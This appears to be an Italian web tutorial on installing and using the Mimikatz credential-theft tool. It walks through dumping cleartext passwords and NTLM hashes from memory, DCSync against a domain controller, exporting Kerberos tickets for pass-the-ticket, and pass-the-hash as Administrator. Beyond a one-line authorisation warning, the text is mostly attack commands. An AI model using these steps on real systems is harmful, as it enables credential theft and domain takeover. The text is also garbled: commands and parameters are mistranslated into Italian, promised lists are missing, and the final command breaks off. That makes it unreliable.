Mimikatz è un potente strumento di post-exploitation progettato per estrarre dalla memoria password in chiaro, hash, codici PIN e ticket Kerberos. È ampiamente utilizzato dai penetration tester e dai professionisti della sicurezza per valutare le vulnerabilità dei sistemi. Questa guida fornisce un approccio passo dopo passo all’installazione e all’utilizzo di Mimikatz per i test etici di sicurezza.
Attenzione: L’uso non autorizzato di Mimikatz è illegale. Assicurarsi di avere l’autorizzazione prima di utilizzarlo in qualsiasi ambiente.
Prima di installare Mimikatz, assicurarsi di disporre di quanto segue:
Mimikatz è uno strumento open-source disponibile su GitHub. Per scaricarlo:
In alternativa, è possibile clonare il repository usando Git:
git clone https://github.com/gentilkiwi/mimikatz.git
Poiché Mimikatz richiede privilegi amministrativi, seguite questi passaggi per eseguirlo:
cd percorso\to\mimikatz\x64
mimikatz.exe
#
di mimikatz
.Prima di estrarre le credenziali, verificare di avere privilegi sufficienti:
privilegio::debug
In caso di esito positivo, si dovrebbe vedere: Privilegio '20' OK
Per estrarre le password in chiaro dalla memoria, utilizzare:
sekurlsa::logonpasswords
Questo visualizzerà nome utente, dominio e password in chiaro, se disponibili.
Gli hash NTLM possono essere utilizzati per attacchi pass-the-hash. Per estrarli, eseguire:
lsadump::sam
Oppure, per i sistemi remoti:
lsadump::dcsync /dominio:dominio di destinazione.com /utente:Amministratore
Per recuperare i ticket Kerberos dal sistema:
sekurlsa::tickets /export
Esporta i file .kirbi
, che possono essere utilizzati negli attacchi pass-the-ticket.
Per autenticarsi con un hash NTLM invece che con una password:
sekurlsa::pth /utente:Amministratore /dominio:example.com /ntlm: